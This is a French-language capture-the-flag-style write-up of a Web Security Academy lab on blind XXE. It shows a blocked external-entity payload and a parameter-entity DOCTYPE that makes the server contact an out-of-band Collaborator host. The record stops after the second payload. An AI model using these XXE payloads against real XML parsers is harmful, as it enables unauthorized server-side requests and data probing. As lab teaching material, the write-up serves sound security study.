XXE aveugle - entités de paramètres XML (OOB)

Blind XXE with out-of-band interaction via XML parameter entities

Lab: Blind XXE with out-of-band interaction via XML parameter entities | Web Security AcademyWebSecAcademy

La fonctionnalité Check stock du laboratoire analyse des entrées XML. Elle n’affiche pas les valeurs inattendues et bloque les entités externes XML classiques côté serveur.

Objectif Exploiter la vulnérabilité XXE en aveugle en forçant le parseur XML à effectuer une requête externe (DNS / HTTP) vers un service OOB (ex. Burp Collaborator / Oastify) en utilisant une entité de paramètre.

1) Entité externe classique (bloquée)

Payload envoyé — une entité système référencée depuis un URL externe, puis appelée depuis <productId> :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "https://h4m66g65x80x7bwj3ueflms990fr3hr6.oastify.com">]>
<stockCheck>
  <productId>
    &myFile;
  </productId>
  <storeId>
    1
  </storeId>
  </stockCheck>

Résultat observé : le serveur renvoie l’erreur "Entities are not allowed for security reasons" — la déclaration d’entités externes classiques est bloquée.

2) Tentative avec entité de paramètre (approche OOB)

Pour contourner le blocage, on teste l’usage d’une entité de paramètre — la déclaration utilise % et injecte ensuite son contenu dans la DTD :

<!DOCTYPE foo [<!ENTITY % myFile SYSTEM "https://s70h9r9g0j38amzu65hqoxvkcbi36vuk.oastify.com"> %myFile;]>

Mis à jour il y a 3 mois

hashtagBlind XXE with out-of-band interaction via XML parameter entities

Blind XXE with out-of-band interaction via XML parameter entities